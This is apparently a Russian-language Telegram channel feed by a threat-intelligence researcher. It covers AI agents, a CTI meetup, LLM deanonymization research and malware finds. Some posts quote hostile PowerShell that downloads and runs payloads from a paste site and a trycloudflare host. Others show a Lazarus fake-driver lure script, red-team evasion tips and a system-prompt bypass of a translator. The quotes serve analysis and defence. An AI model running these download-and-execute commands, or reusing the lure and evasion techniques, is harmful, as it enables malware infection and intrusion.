Secure Lemur

Пока промежуточный итоги такие: 1) AI агенты как таковые - это топ, концепция очень нравится. 2) OpenClaw невозможно лагающее создание. Админить его тяжело, пришлось сносить 3) Спасибо @poxek за рекомендацию в чате. Поставил hermes - работает на порядки стабильнее. Но, наверное, следующий этап это написание своего агента. продолжаю тестировать, докручиваем с агентом скиллы, надеюсь получится кое-что интересное. ❤@seclemur |❤ @threat_chat

Я буду, приходите тоже :)

Всем привет 👋. Инсека и Технологии киберугроз приглашают вас на CTI meetup #5. 🍻 обсуждаем рабочие моменты, делимся опытом 📆 23 мая, 14:00-20:00 📍 Место: Лофт «Москва» по адресу Москва, Берсеневская набережная, 6с3 Программа CTI meetup #5: Сбор гостей 13:30-14:00 Начало выступлений 14:00 1. Threat Hunting в опенсорсе: злоумышленники используют ИИ, мы тоже, но есть нюанс Раковский Станислав (руководитель группы Supply Chain Security в Positive Technologies) 2. Хватит «приручать фиды»: что реально работает в телекоме Елютин Павел (руководитель направления анализа киберугроз, Билайн) Снежков Александр (эксперт по анализу киберугроз, Билайн) 3. Докладчик уточняется 🍻 Кофе-брейк 15:30-16:00 4. Практический CTI 2.0: добро пожаловать в Cyberpunk. Ну почти. Мешков Андрей (независимый эксперт) 5. Квиз ✌️17:00-20:00 С вас общение, с нас пиво. Мы рады будем видеть всех желающих, но к сожалению, количество мест ограничено размерами помещения. 👉🏼 Зарегистрироваться

Сделал скилл который по плану будет детектить малварные C2 на потоке. Если будет адекватно работать, то сделаю отдельный канальчик с фидами как раньше было в @tinyscope. Обзаведусь недостающими ключами к search engines и поставлю на поток. Сейчас решил добавить Shodan, FOFA, Zoomeye, Netlas. Какие еще предложения ? + может кто поделится готовыми рулями к таким поисковикам, буду рад перенять вашу опыт и мудрость. Из полезного знаю такие ресурсы - ссылка1 ссылка2

Следом другая статья, но тоже про агентов и безопасность. Это исследование про беспрерывную деанонимизацию пользователей с помощью LLM. То, что раньше требовало часов ручной работы OSINT-аналитика, теперь можно автоматизировать и поставить на поток😐 Ресерчеры рассказывают как они с помощью агентов и инструментов для них построили целый пайплайн по деанону пользователей: 1️⃣ Extract – из постов в социальных сетях пользователя модель вытаскивает сырые факты: город, работа, образование, хобби, события. 2️⃣ Search – LLM генерирует поисковые запросы на основе собранных данных и ищет похожих кандидатов в интернете. 3️⃣ Reason – сопоставляет найденные профили с извлечёнными фактами семантически. 4️⃣ Calibrate – оценивает уверенность и отбрасывает слабые совпадения. LLM одновременно анализирует, ищет и сопоставляет информацию. Это позволяет автоматизировать деанонимизацию и работать в масштабе, что раньше делал только человек. Как-будто бы анонимность закончилась на некоторое время. Теперь если ты хочешь быть анонимным в интернете придется делать poisoning своих данных и использовать прочие уязвимости/слабости чтобы испортить LLM работу. ❤@seclemur |❤ @threat_chat

Теперь вы будете встречать меня на VT чаще. Я теперь нейрослоп 💃 А я всего лишь попросил его научиться отправлять комменты к индикаторам на VT, если в статье он находит какие-то IoC.

Наконец приступил к тестированию нашумевшего OpenClaw. С горем пополам,но развернул у себя его на домашней машине для тестов 😂 Сходу испытал детский восторг - штука невероятно адаптивная и очень гибкая. Выше скриншоты буквально сразу после первоначальной настройки. А сколько еще всего впереди. Безусловно прежде чем запускать его проштудировал кучу постов в твиттере на тему того как он все удаляет и ломает. Морально к этому готов🤩 Основная гипотеза для проверки - можно ли с околонулевыми знанями в AI агентах сделать из него полноценного TI-аналитика-помощника, способного анализировать отчеты и делать расследования на потоке. А можем в ходе изучения появятся дополнительные мысли. На старте план такой: Скинул в него IoC -> он пробежался по всем источникам что у него есть и собрал отчет по нему, а также дал какие-то рекомендации. Спойлер - научить его этому дело 5 минут. И ноль строчек кода самостоятельно написанных. Интересна ли эта тема, нужно ли освещать ее чаще? В целом, если были какие-то интересные идеи как использовать агента, но у тебя не доходили руки разобраться/протеститровать, то можно писать их в комменты, а я попробую это реализовать 👇 ❤@seclemur |❤ @threat_chat

Не совсем тематика этого канала, но тоже важно подстветить. В прошлый раз затронулась тема про то как разгрузить голову. В этот раз я тоже не с пустыми руками. Нашел исследование которое точно объясняет, почему рабочий день часто ощущается как «работал, но ничего не сделал». Суть статьи в том что продуктивность зависит не от силы воли, а от трёх вещей: как часто тебя отвлекают, сколько времени уходит на возвращение в задачу и какой минимальный непрерывный отрезок нужен, чтобы вообще получить результат. Каждый раз, когда отвлекаешься (например, проверка соцсетей или ответ на сообщение в чате), мозгу нужно время, чтобы вернуться в рабочий ритм. Исследования автора показывают, что на восстановление фокуса может уходить до 23 минут. С помощью математических формул автор посчитал, каковы шансы в 100 рабочих днях найти три цельных 60-минутных отрезка: • если отвлекаться 1 раз в час — 70%, • если прерываться 2 раза в час, вероятность сокращается в 5 раз. Самый забавный вывод - при частых прерываниях (например, каждые 3–5 минут) глубокая работа становится математически почти невозможной (!). А теперь вспомни как часто сыпятся уведомления или когда случайно открываешь телеграм и видишь непрочитанный пост в канале что не читал уже два года. Замьютил несколько месяцев назад все чаты и приложения - стал более концентрированным и спокойным😋 Нет у тебя модного СДВГ, это просто обстоятельства в которых мы все живем. Исследование Другая полезная статья на русском ❤@seclemur |❤ @threat_chat

Иногда приходится и такие атаки изучать (видео 👆😁) LNK файл с командой, которая качала видео пару недель назад:

-c "$b=(irm https://pastes.io/raw/aaaaigz0ex);[IO.File]::WriteAllBytes(\"$env:TEMP\v.mp4\",[Convert]::FromBase64String($b));start $env:TEMP\v.mp4"

Но забавно что сейчас на этом пастбине висит другой скрипт:

if (!(Test-Path "$env:LOCALAPPDATA\Discord\*\Discord.exe") -and !(Get-PSDrive -PSProvider FileSystem | ForEach-Object { Get-ChildItem -Path $_.Root -Filter "Discord.exe" -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1 })) { exit }

Invoke-WebRequest -OutFile $env:AppData\RuntimeBroker.exe -Uri https://enjoyed-hop-definitions-tee.trycloudflare.com/64.exe

start $env:AppData\RuntimeBroker.exe

Интересно что это за аудитория, которую таргетят путем поиска дискорда на машине. Вероятно та же аудитория, что и писала этот скрипт😂 Пейлоад, увы, уже не доступен. VirusTotal ❤@seclemur |❤ @threat_chat

Ультимативный гайд по организации инфраструктуры для пентестов - тык Много интересных мыслей есть и для исследователей угроз. Но глава о CDN Relays особенно понравилась. Недавно натыкался на несколько примеров реальных атак, где злоумышленники использовали инфраструктуру Microsoft Azure в качестве командного центра. Главного загвоздка этой техники заключается в том, что домены от облачных сервисов микромягких чаще всего от греха подальше в вайтлистах и теряются в огромном потоке телеметрии, которую отправляет Windows на свои сервера. Попробуйте запустить машину хотя бы в том же самом Any.Run и посмотрите на количество улетевших данных просто потому что система запустилась😂 Тем самым всего за пару баксов аренды пэнтестеры прячут свое сетевое взаимодействие в легитимном трафике. Ниже список доменов облачных сервисов Azure, за трафиком в сторону которых стоит присматривать бдительнее:

*.accesscontrol.windows.net
*.graph.windows.net
*.onmicrosoft.com
*.azure-api.net 
*.biztalk.windows.net
*.blob.core.windows.net
*.cloudapp.net    
*.cloudapp.azure.com
*.azurecr.io      
*.azurecontainer.io
*.vo.msecnd.net   
*.cosmos.azure.com
*.documents.azure.com
*.file.core.windows.net
*.azurefd.net     
*.vault.azure.net 
*.azmk8s.io
*.management.core.windows.net
*.origin.mediaservices.windows.net
*.azure-mobile.net
*.queue.core.windows.net
*.servicebus.windows.net
*.database.windows.net
*.azureedge.net
*.table.core.windows.net
*.trafficmanager.net
*.azurewebsites.net
*.visualstudio.com

❤@seclemur |❤ @threat_chat

Попалась очередная атака от Lazarus. Сайт для прохождения собеседований. В данном случае на позицию маркетолога. После прохождения опроса из нескольких задач для успешного видеозвонка просит обновить драйвера, открыв командную строку и вставив нужную команду. Все бы ничего, да только в буфер обмена приходит немного расширенная команда, скачивающая полезную нагрузку 😂 Забавный момент: для симуляции установки драйверов запускается vbs скрипт с таким содержанием:

Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")

objShell.Run "cmd /c title NVIDIA Display Driver Update Utility", 0, False
objShell.Run "cmd /c color 0A", 0, False
objShell.Run "cmd /c cls", 0, False

WScript.Echo ""
WScript.Echo "================================================"
WScript.Echo "  NVIDIA Display Driver Update Utility"
WScript.Echo "================================================"
WScript.Echo ""
WScript.Echo "[INFO] Scanning for compatible hardware..."
WScript.Sleep 333
WScript.Echo "[INFO] Detected: NVIDIA GeForce Graphics Adapter"
WScript.Sleep 1167
WScript.Echo "[INFO] Current driver version: 536.99"
WScript.Sleep 500
WScript.Echo "[INFO] Available driver version: 581.80 (WHQL)"
WScript.Echo ""
WScript.Sleep 400

WScript.Echo "[STEP 1/5] Preparing driver installation..."
WScript.Sleep 2330
WScript.Echo "  Status: Checking system compatibility"
Call AnimateDots(3, 50, 150)
WScript.Echo "  OK"
WScript.Sleep 667
WScript.Echo "  Status: Verifying disk space"
Call AnimateDots(3, 80, 200)
WScript.Echo "  OK (2.1 GB required)"
WScript.Sleep 167
WScript.Echo "  Status: Creating system restore point"
Call AnimateDots(4, 50, 150)
WScript.Echo "  OK"
WScript.Sleep 67
WScript.Echo "  Status: Preparation completed"
WScript.Echo ""
WScript.Sleep 67  

Почитать про подобные киллчейны от этой группировки и их деанон можно тут - ссылка IOCs:

breezyhr[.us
api.bitken[.cloud
93.127.215[.188
187.77.220[.50

❤@tinyscope | ❤@seclemur |❤ @threat_chat

Системный промпт он тоже отдает без проблем 😁 оставил в комментариях посмотреть 👇🏼

У OpenAI появился ИИ-переводчик - https://chatgpt.com/translate/. Пока что ломается от любого простого обхода системного промпта 😁 Как думаете, намеренно? ❤@tinyscope | ❤@seclemur |❤ @threat_chat

Размышлений пост 2025 для меня, как думаю и для многих , стал годом интеграции различных форматом ИИшек в жизнь и рабочие процессы. За предыдущий год я перепробовал ИИ для кучи разных задач - искал информацию, делал отчеты, автоматизировал работу, просил дать лучший рецепт говяжьих крылышек. Но самым ломающим все мои шаблоны оказался вайб-кодинг. Всего за 20 баксов ты получаешь себе инструмент, который позволяет реализовать тебе прототип любой идеи буквально за день. Реально любой идеи. Все что тебе нужно для этого - продолжать структурировать свои мысли и последовательно просить его делать то что тебе нужно. На выходе у тебя неидеальный, непродовый, но работающий продукт, который позволит тебе протестировать твою гипотезу или идею. За 2025 год я сделал много разных пет проектов с помощью ИИ. Например, создал полностью фронтенд, не написав не единой строчки кода на JS. И это работало. Есть и минусы. Не говорю о том что все надо перепроверять, галлюцинации и прочее, это всем уже ясно. Я заметил вот что - МЛные инструменты позволяют решать гораздо больше задач в единицу времени. Но как следствие это влечет за собой не сокращение труда и отдых на пляже, а наоборот увеличение количества задач, которые приходится решать. Такой вот парадокс. Хорошо это или плохо увидим в будущем. Это я все к чему. Если в 2026 вы не планируете использовать ИИ в своей работе, то будете человеком, кто пашет поле с помощью плуга и лошади, когда соседи уже используют трактор. ❤@tinyscope | ❤@seclemur |❤ @threat_chat

Наткнулся на статью как оптимизировать свои дела и разгрузить голову. Главный посыл - в голове есть оперативная память и ее нужно переодически чистить, чтобы было место для обработки новой информации. Вроде бы очевидные вещи, но работают очень эффективно. https://habr.com/ru/articles/972958/ ❤@tinyscope | ❤@seclemur |❤ @threat_chat

Some OPSEC life hacks 🕷 Во время развертывания инфраструктуры для Red Team операций важно оставаться незаметным как можно дольше. Часто аналитикам и автоматизированным сканерам достаточно данных из публичных ресурсов вроде Shodan или Censys, чтобы обнаружить активность, заблокировать IP или добавить его в TI-базы 🔍 Чтобы снизить риск “засвета” и минимизировать отпечаток, стоит заранее заблокировать пул IP подобных сервисов на стороне вашего сервера 😃 Я собрал небольшой bash скрипт, который автоматически создает iptables правила для блокировки известных диапазонов. Список может быть неполным, поэтому feel free предлагать дополнительные адреса (нужны пруфы) ✍️ 💻 Script: https://gist.github.com/s0ld13rr/5f43bb609d29aa24a3063d2cb3d6b557 P.S. Use only in authorized Red Team assessments 🧢 s0ld13r

Пришло письмо от OpenAI о том что произошел инцидент у одного из их подрячиков. Без детальных подробностей, но с примерным описанием какие пользовательские данные были затронуты и какие последствия для пользователей могут наступить.

What you should keep in mind  
The information that may have been affected here could be used as part of phishing or social engineering attacks against you or your organization.

Since names, email addresses, and OpenAI API metadata (e.g., user IDs)  were included, we encourage you to remain vigilant for credible-looking phishing attempts or spam. As a reminder:
 • Treat unexpected emails or messages with caution, especially if they include links or attachments.
 • Double-check that any message claiming to be from OpenAI is sent from an official OpenAI domain.
 • OpenAI does not request passwords, API keys, or verification codes through email, text, or chat.
 • Further protect your account by enabling multi-factor authentication.

❤@tinyscope | ❤@seclemur |❤ @threat_chat

У zoomeye.ai по случаю черной пятницы появилась однодневная акция на пожизненный тариф membership за 149$. Акция будет идти по их словам до 19:00 по мск. Оплатить можно через PayPal и иностранную карту. Ну и если будешь создавать новый аккаунт, то моя рефка тут 😘 Китайские сканеры IoT очень хороши, поэтому иду раскошеливаться. Хотелось бы,конечно, получить моего фаворита в мире сканеров fofa по хорошей скидке, но они пока никаких акций не запустили. Но я слежу внимательно 👀 И традиционно все скидки на cybersec сервисы постят на этом гите. ❤@tinyscope | ❤@seclemur |❤ @threat_chat

Итоговая версия нашего фришного портальчика. Уже в эту субботу представлю его на CTI Meetup (который мы проводим с ребятами из INSECA) З.ы. Как и обещал, в паблик версии все будет на русском (ну и аглицком) :)

📰 Кибердайджест 16.11.2025: 1. Источник